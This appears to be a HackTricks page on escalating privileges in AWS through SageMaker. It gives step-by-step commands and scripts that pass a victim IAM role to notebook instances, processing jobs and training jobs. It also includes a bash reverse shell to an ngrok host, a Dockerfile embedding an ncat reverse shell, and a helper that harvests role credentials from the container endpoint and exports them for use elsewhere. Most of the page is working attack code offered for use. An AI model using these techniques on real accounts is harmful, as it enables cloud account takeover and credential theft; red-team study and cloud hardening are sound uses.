AWS - Sagemaker Privesc


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

iam:PassRole, sagemaker:CreateNotebookInstance, sagemaker:CreatePresignedNotebookInstanceUrl

Start by creating a notebook instance with the IAM role whose credentials you want attached to it (the role must be one the SageMaker service can assume, and you need iam:PassRole on it):

```bash
aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
```

The response should contain a NotebookInstanceArn field with the ARN of the newly created notebook instance. The instance starts in the Pending state; once it reaches InService (check with `aws sagemaker describe-notebook-instance --notebook-instance-name example`), use the create-presigned-notebook-instance-url API to mint a URL that grants browser access to it:

```bash
aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>
```

Open the URL in a browser and click `Open JupyterLab` in the top right corner, then scroll down to the "Launcher" tab and, under the "Other" section, click the "Terminal" button.

From that terminal the attached IAM role's credentials are available: the AWS CLI and SDKs inside the notebook instance already run as that role (check with `aws sts get-caller-identity`), and the raw keys can be pulled from the instance metadata service.

Potential Impact: Privesc to the sagemaker service role specified.
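The same flow as one script, added here as an example (not code from the original page): it creates the instance with the target role, polls until the instance is InService, which is the step the CLI commands above leave implicit and without which the presigned URL is useless, and then prints the URL. It assumes the AWS CLI is configured with the low-privileged credentials holding iam:PassRole, sagemaker:CreateNotebookInstance and sagemaker:CreatePresignedNotebookInstanceUrl; every SageMaker call goes through a small `sm` wrapper so the control flow can be exercised without an account.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): notebook-instance privesc end to end.
# Assumes the AWS CLI is configured with the low-privileged principal.
set -u

# All SageMaker calls go through this wrapper so it can be stubbed for testing.
sm() { aws sagemaker "$@"; }

# Poll the notebook instance status.
# Returns 0 on InService, 1 on a terminal/unexpected state (Failed, Stopped,
# Deleting, ...) or on an API error, 2 if it is still not ready after $3 polls.
# $1 = instance name, $2 = seconds between polls, $3 = maximum number of polls
wait_for_notebook() {
  local name=$1 interval=${2:-15} max=${3:-40} status i=0
  while [ "$i" -lt "$max" ]; do
    status=$(sm describe-notebook-instance \
      --notebook-instance-name "$name" \
      --query NotebookInstanceStatus --output text) || return 1
    case "$status" in
      InService) return 0 ;;
      Pending|Updating) sleep "$interval" ;;
      *) echo "wait_for_notebook: $name is $status, giving up" >&2; return 1 ;;
    esac
    i=$((i + 1))
  done
  return 2
}

# Create the instance with the victim role attached, wait for it, and print the
# presigned URL that gives a browser session (and terminal) running as that role.
# $1 = instance name, $2 = role ARN to steal, $3 = instance type (optional)
notebook_privesc() {
  local name=$1 role_arn=$2 itype=${3:-ml.t2.medium}
  sm create-notebook-instance \
    --notebook-instance-name "$name" \
    --instance-type "$itype" \
    --role-arn "$role_arn" \
    --query NotebookInstanceArn --output text || return 1
  wait_for_notebook "$name" || return 1
  # 43200 s (12 h) is the longest session lifetime the API accepts.
  sm create-presigned-notebook-instance-url \
    --notebook-instance-name "$name" \
    --session-expiration-duration-in-seconds 43200 \
    --query AuthorizedUrl --output text
}

# Only runs the attack when explicitly requested, so the file can be sourced:
#   RUN_PRIVESC=1 ./notebook_privesc.sh example arn:aws:iam::<account-id>:role/service-role/<role-name>
if [ -n "${RUN_PRIVESC:-}" ]; then
  notebook_privesc "$@"
fi
```

The last line printed is the AuthorizedUrl; paste it into a browser and follow the JupyterLab/Terminal steps above. Anyone holding that URL gets the role, so treat it like the credentials themselves.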

sagemaker:CreatePresignedNotebookInstanceUrl

If there are already notebook instances running in the account and you can list them with sagemaker:ListNotebookInstances (or discover their names in any other way), you can mint a presigned URL for them, access them, and steal the credentials of their execution role as shown in the previous technique. No iam:PassRole is needed because the role is already attached.

```bash
aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>
```

Potential Impact: Privesc to the sagemaker service role attached to the notebook instance.

sagemaker:CreateProcessingJob, iam:PassRole

An attacker with these permissions can make sagemaker run a processing job with a sagemaker role attached. The attacker controls the container definition (image, entrypoint and arguments) that will run on a SageMaker-managed instance, and can therefore steal the credentials of the attached IAM role, which the container receives through the ECS-style container credentials endpoint (169.254.170.2).

```bash
# I uploaded a python docker image to the ECR
# Any image with a shell works; ContainerEntrypoint/ContainerArguments give
# arbitrary command execution, here a reverse shell to an attacker listener
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role>

# In my tests it took 10min to receive the shell
# Once the shell lands, the role credentials come from the container credentials
# endpoint (same mechanism ECS tasks use); the relative URI is in the environment
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds
```

Potential Impact: Privesc to the sagemaker service role specified.

sagemaker:CreateTrainingJob, iam:PassRole

An attacker with these permissions can create a training job running an arbitrary container with a role attached to it, and therefore steal the credentials of that role.

warning

This scenario is harder to exploit than the previous one because you need to build a Docker image that sends the reverse shell or the credentials to the attacker by itself (at the time of writing the training job configuration offered no way to set the start command). Note that the AlgorithmSpecification structure has since gained ContainerEntrypoint and ContainerArguments fields; if your CLI version exposes them, the processing-job approach above can be reused without a custom image.

```bash
# Build the docker image
mkdir /tmp/rev
## Note that the training job will invoke an executable called "train"
## That's why I'm putting the rev shell in /bin/train
## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF

cd /tmp/rev
sudo docker build . -t reverseshell

# Push it to ECR (the repository must already exist; create it if needed)
aws ecr create-repository --repository-name reverseshell --region <region>
aws ecr get-login-password --region <region> | sudo docker login --username AWS --password-stdin <account_id>.dkr.ecr.<region>.amazonaws.com
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
```
```bash
# Create the training job with the docker image created
# MaxRuntimeInSeconds also bounds how long the reverse shell lives
aws sagemaker create-training-job \
--training-job-name privescjob \
--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
--algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest", "TrainingInputMode": "Pipe"}' \
--role-arn <role-arn> \
--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
--stopping-condition '{"MaxRuntimeInSeconds": 600}'

# To get the creds (run from the reverse shell inside the container)
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
## Creds env var value example: /v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
```
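Both the processing-job and the training-job techniques end with the same step: a curl against the container credentials endpoint that returns a JSON document. What a practitioner actually needs is that document turned into environment variables usable from the attacker's machine. The helper below is an added example, not code from the original page; it parses the response with sed only, because the minimal images used above have no jq, and it works on a constructed sample (fake values, canonical example account ID) so the parsing can be checked offline. `harvest_container_creds` is the function to run inside the job container.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): turn the container credential
# endpoint response into export lines for the AWS CLI on another host.
set -u

# Extract one string value from a flat JSON object on stdin. $1 = key name.
# Assumes the value contains no escaped quotes, which holds for AWS credential JSON.
json_field() {
  sed -n "s/.*\"$1\"[[:space:]]*:[[:space:]]*\"\([^\"]*\)\".*/\1/p" | head -n 1
}

# Read the credential document on stdin and print export lines that make the
# AWS CLI/SDKs act as the stolen role. Fails if any key is missing.
creds_to_env() {
  local json ak sk tok exp role
  json=$(cat)
  ak=$(printf '%s' "$json" | json_field AccessKeyId)
  sk=$(printf '%s' "$json" | json_field SecretAccessKey)
  tok=$(printf '%s' "$json" | json_field Token)
  exp=$(printf '%s' "$json" | json_field Expiration)
  role=$(printf '%s' "$json" | json_field RoleArn)
  if [ -z "$ak" ] || [ -z "$sk" ] || [ -z "$tok" ]; then
    echo "creds_to_env: incomplete credential document" >&2
    return 1
  fi
  printf '# role: %s (expires %s)\n' "${role:-?}" "${exp:-?}"
  printf 'export AWS_ACCESS_KEY_ID=%s\n' "$ak"
  printf 'export AWS_SECRET_ACCESS_KEY=%s\n' "$sk"
  printf 'export AWS_SESSION_TOKEN=%s\n' "$tok"
}

# Inside the processing/training job container: fetch the live document and
# print the exports. Needs only curl; the relative URI is set by SageMaker.
harvest_container_creds() {
  curl -sf "http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI:?not inside a SageMaker job container}" \
    | creds_to_env
}

# Constructed sample response with fake values, shaped like the real endpoint
# output, so the parser can be exercised without a job running.
SAMPLE_CREDS='{"RoleArn":"arn:aws:iam::123456789012:role/service-role/SageMakerRole","AccessKeyId":"ASIAEXAMPLEKEYID","SecretAccessKey":"examplesecret/KEY+0000","Token":"IQoJb3JpZ2luX2VjEXAMPLE==","Expiration":"2024-01-01T00:00:00Z"}'
```

Paste the printed export lines into a shell on the attacker's machine and confirm with `aws sts get-caller-identity`; the credentials are short-lived (see the Expiration field), so pull them again from the container if the session expires.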

Potential Impact: Privesc to the sagemaker service role specified.

sagemaker:CreateHyperParameterTuningJob, iam:PassRole

An attacker with these permissions will (potentially) be able to create a hyperparameter tuning job, running an arbitrary container on it with a role attached to it.
I haven't exploited it because of lack of time, but it looks like the previous exploit; feel free to send a PR with the exploitation details.
